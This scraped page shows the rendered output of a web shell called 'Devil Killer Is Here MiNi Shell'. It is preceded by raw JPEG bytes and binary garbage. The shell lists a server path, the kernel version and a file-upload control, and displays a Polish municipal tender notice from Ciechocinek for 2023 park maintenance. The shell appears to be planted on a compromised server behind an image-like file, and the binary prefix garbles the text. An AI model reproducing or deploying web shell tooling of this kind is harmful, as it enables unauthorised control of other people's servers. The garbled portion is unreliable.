JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221206/0047867901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Konserwacja, sprzątanie i utrzymywania publicznych terenów zielonych na terenie miasta Ciechocinka z jednoczesnym wywozem nieczystości na składowisko odpadów w okresie letnim i zimowym. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA CIECHOCINEK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866399</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mikołaja Kopernika 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciechocinek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-720</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ratusz@ciechocinek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ciechocinek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Konserwacja, sprzątanie i utrzymywania publicznych terenów zielonych na terenie miasta Ciechocinka z jednoczesnym wywozem nieczystości na składowisko odpadów w okresie letnim i zimowym. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1893e244-7558-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00478679</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00009925/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Konserwacja, sprzątanie i utrzymywanie publicznych terenów zielonych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> bip.ciechocinek.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">bip.ciechocinek.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż oferta), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP, TED lub ID postępowania).<br/>2)	Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email ratusz@ciechocinek.pl, kierownikgt@ciechocinek.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA DO SPECYFIKACJI<br/><br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję osoby fizyczne, których dane są zbierane w trakcie niniejszego postępowania że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Miejska Ciechocinek, reprezentowana przez Burmistrza, z siedzibą w Ciechocinku przy ul. Kopernika 19 <br/>tel. 54 4161800, faks 54 2836423, e-mail ratusz@ciechocinek.pl <br/>2) inspektorem ochrony danych osobowych w Gminie Miejskiej Ciechocinek jest Pan Mirosław Ciuryło tel. 54 4161800, e-mail iod@ciechocinek.pl <br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na świadczenie usług w zakresie Konserwacji, sprzątania i utrzymywania publicznych terenów zielonych na terenie miasta Ciechocinka z jednoczesnym wywozem nieczystości na składowisko odpadów w okresie letnim i zimowym prowadzonym w trybie podstawowym;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i 2018), dalej „ustawa Pzp”; <br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres prac do wykonania obejmuje następujące tereny:<br/>	1. Park Zdrojowy - trawniki - 164000 m2 <br/> - alejki utwardzone - 7983 m2<br/> - alejki i place ziemne	- 5757,8 m2<br/><br/>2. Park Tężniowy	- trawniki - 177472 m2<br/> - aleja utwardzona - 16057 m2<br/> - alejki i place ziemne - 9795 m2<br/><br/>	3. Park Sosnowy	- trawniki - 45000 m2<br/> - alejki z kostki brukowej - 10673 m2<br/> - alejki żwirowe - 6790 m2<br/> - alejki z płytek - 1573 m2<br/><br/>	4. Teren przy ul. Staszica - trawniki - 16322 m2<br/> - alejki ziemne - 4920 m2<br/> - alejka stanowiąca przedłużenie ul. Staszica - 1986 m2<br/><br/>	5. Zieleńce miejskie - trawniki - 203172 m2<br/> w tym do dwukrotnego skoszenia w ciągu roku<br/> - 47112 m2<br/> - alejki utwardzone - 1734 m2<br/> - alejki ziemne - 1164 m2<br/>	6. Plac za teatrem i przy kinie - trawniki - 3438 m2<br/> - alejki utwardzone - 2903 m2<br/> 7. Aleja pomiędzy pocztą a parkiem Zdrojowym <br/> - trawniki - 700 m2<br/> - alejka utwardzona - 700 m2<br/> 8. Inne tereny zielone<br/>1) Stolarska - 1773 m2	<br/>2) Kopernika 7 - 351 m2<br/>3) Zdrojowa 27a - 1304 m2<br/>4) Zdrojowa 27 - 386 m2<br/>5) Hermanowskiego / Broniewskiego - 3647 m2<br/>6) Wojska Polskiego 11 - 964 m2<br/>7) Mickiewicza 20a - 2909 m2<br/>8) Wierzbowa 1 - 1958 m2<br/>9) Zdrojowa 11 - 500 m2 <br/><br/>5.2 Szczegółowy zakres czynności:<br/><br/>1) Odśnieżanie i zwalczanie oblodzenia alejek i placów o łącznej powierzchni - 15941 m2, w tym:<br/> - o nawierzchni utwardzonej - 10362 m2<br/> - o nawierzchni nieutwardzonej - 5579 m2<br/>według lokalizacji przedstawionej na szkicu mapowym, stanowiącym załącznik „A” do specyfikacji.<br/>Częstotliwość wykonywania tych prac - ciągłe w przypadku ich wystąpienia.<br/><br/>2) Cięcia formujące drzew krzewów oraz żywopłotów z uprzątnięciem części ściętych, (drzew szt.100, żywopłotów 990 mb ), a także likwidacja samo-siewów usytuowanych: w alei głównej w Parku Zdrojowym oraz cięcie korygujące skupin krzewów w Parku Zdrojowym, skwer zielony przy ul. 3 Maja róg Armii Krajowej.<br/>Częstotliwość wykonywania prac stosownie do wymogów związanych gatunkowością drzew, żywopłotów i krzewów na których należy przeprowadzić zabiegi pielęgnacyjne.<br/><br/>3) Karczowanie drzew i krzewów przeznaczonych do usunięcia (wiatrołomy, obumarłe i inne naturalne ubytki) – stosownie do otrzymanych decyzji, a w zamian za usunięte dokonywanie nowych nasadzeń z materiału powierzonego, z uwzględnieniem podlewania nowo posadzonych drzew i krzewów.<br/><br/>4) Bieżące wyrównywanie alejek ziemnych i placów spowodowane ich uszkodzeniem mechanicznym i warunkami atmosferycznymi.<br/><br/>5) Grabienie i usuwanie liści - jesienią sukcesywnie w miarę ich opadania oraz wiosenne uprzątnięcie terenów zielonych określonych w punkcie 5.1 (z wyłączeniem terenu przy ul. Staszica) w terminie do 20 kwietnia każdego roku.<br/><br/>6) Bieżące rozrzucanie kretowisk w przypadku ich wystąpienia.<br/><br/>7) Bieżące odchwaszczanie alejek i placów z wyrównywaniem krawędzi poza terenem przy ul. Staszica.<br/><br/>8) Koszenie zbieranie oraz wywóz trawy. Częstotliwość wykonywania koszenia trawników dostosowana do wymogów utrzymywania ich w okresie wegetacji w stałej ,,strzyży” tj. do 10 cm wysokości runi trawnika, nie mniej niż 5 cm.<br/>Powierzchnia do stałego koszenia trawników wynosi – 623896 m2, <br/>powierzchnia do dwukrotnego koszenia w skali roku – 47112 m2 – teren przy parkingu ul. Kolejowa<br/><br/>9) Zbieranie śmieci i papierów na całych obszarach zielonych na bieżąco.<br/><br/>10) Bieżące opróżnianie śmietniczek 190 szt. raz dziennie do godz. 10.00<br/><br/>11) Usuwanie odrostów drzew z oczyszczaniem mis przy drzewach (110 szt.) na bieżąco.<br/><br/>12) Coroczne malowanie i bieżąca naprawa ławek oraz śmietniczek parkowych (190 szt. śmietniczek, 317 szt. ławek – oraz 39 sztuk ławek znajdujących się w obszarze skweru Ekscentryków i kina ZDRÓJ oraz bieżące usuwanie odchodów ptasich z ławek.<br/><br/>13) Oczyszczanie stawu, sześciu zbiorników wodnych, dwóch kaskad wodnych i ich utrzymywanie – o pow. 2283m2.<br/><br/>14) Bieżące omiatanie alejek w parkach i na zieleńcach.<br/><br/>15) Zapewnienie karmy, karmienie ptactwa ozdobnego utrzymywanego na terenie parku Zdrojowego (4 łabędzie, 4 pawie, 6 bażantów ozdobnych) dwa razy dziennie do dnia 15 listopada.<br/><br/>16) Zabezpieczanie pomieszczeń na okresy zimowe i w okresie występowania meszek dla ptactwa ozdobnego.<br/><br/>17) Podlewanie trawników, krzewów i bylin. Koszty zużycia wody ponosi Gmina Miejska.<br/>Sukcesywne podlewanie trawników i krzewów na terenie parterów Hellwiga.<br/>Sukcesywne podlewanie i pielęgnacje krzewów i bylin w obszarze parku Zdrojowego, parku Tężniowego – teren po rewitalizacji wraz z krzewami przy ul. Tężniowej i ul. Pojednania , zieleńca za Teatrem Letnim i przy Kinie.<br/><br/>18) Obszar parku Tężniowego – teren po rewitalizacji - podlega tym samym zasadom wykonywania prac jak wykonywane są w parku Zdrojowym.<br/><br/>19) Konserwacja – ścieżek mineralnych znajdujących się w parku Zdrojowym zgodnie z instrukcją znajdującą się w dokumentacji tut. Urzędu /w załączeniu/.<br/><br/>20) Konserwacja tj. malowanie odnawianie umiejscawianie budek dla ptaków na stawie w parku Zdrojowym oraz przechowywanie ich przez okres zimowy.<br/><br/>21) Konserwacja, malowanie , montaż i demontaż figurek fontann Jaś i Małgosia, Żabka.<br/><br/>22) Utrzymywanie w stałej sprawności system nawadniania trawników, krzewów i bylin oraz opróżnianie rur systemu z wody na okres zimowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77313000-7 - Usługi utrzymania parków</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">90511300-5 - Usługi zbierania śmieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnianie osób niepełnosprawnych na umowę o pracę na pełny etat</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób na umowę o pracę na pełny etat</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ekologia używanie przez cały okres realizacji zamówienia co najmniej 1 pojazdu o napędzie elektrycznym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki dotyczące:<br/>a) posiadania uprawnień do wykonywania określonej działalności lub czynności, tj. zezwolenia na transport odpadów, o którym mowa w ustawie z dnia 14 grudnia 2012 r. o odpadach ( Dz.U. 2022 poz.699 z późn.zm.) w zakresie realizowanego zadania, a także innych uprawnień, jeżeli przepisy prawa nakładają obowiązek ich posiadania;<br/>b) posiadania wiedzy i doświadczenia; Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał a w- przypadku świadczeń okresowych lub ciągłych również wykonuje <br/>przynajmniej 1 zadania o podobnym charakterze i wartości nie mniejszej niż 200.000,00 zł netto rocznie, w tym jedno zadanie na terenie parku wpisanego do rejestru zabytków. Przez zadania o podobnym charakterze zamawiający rozumie świadczenie usług w zakresie utrzymania czystości i porządku terenów zielonych i ciągów pieszych.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie;<br/>c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,<br/>Zamawiający uzna, że Wykonawca spełnia w/w warunek jeżeli wykaże, iż dysponuje lub będzie dysponował dwoma osobami odpowiedzialnymi za kierowanie robotami związanymi z pielęgnacją zieleni oraz wykaże, że dysponuje lub będzie dysponował następującym sprzętem i urządzeniami: kosiarki 9 szt. w tym: kosiarki rotacyjne, kosiarki bijakowe, kosiarki spalinowe samojezdne, 4 szt. wykaszarki żyłkowe, 5 sztuk piły spalinowe, 3 sztuki nożyce do żywopłotów, 3 sztuki odśnieżarko sypiarki, 2 szt. urządzeń do zbierania liści, 1 sztukę wysięgnik koszowy do 21m zasięgu oraz 4 sztuki pojazdów transportowych w tym przynajmniej jeden melex <br/> Wykonawca wykaże, że będzie zatrudniać przy realizacji zamówienia przez cały okres obowiązywania umowy co najmniej 5 pracowników na umowę o pracę, w tym co najmniej <br/> 1 osobę niepełnosprawną;<br/><br/>d) sytuacji ekonomicznej i finansowej;<br/>Zamawiający uzna, że Wykonawca spełnia w/w warunek jeżeli wykaże, iż:<br/>	posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 200.000,00 zł,<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie;<br/><br/>2) posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 150.000,00 zł,<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten musi być spełniony przez każdego z wykonawców;<br/><br/>e) nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust.1 i 109 ust.1 ustawy Pzp;<br/> <br/>Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca <br/>spełnia wyżej wymienione warunki.<br/>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.<br/>Jeżeli Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe Podwykonawcy w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 118 Ustawy zobowiązany jest podać nazwę (firmę) Podwykonawcy, a także aktualne na dzień składania ofert oświadczenie 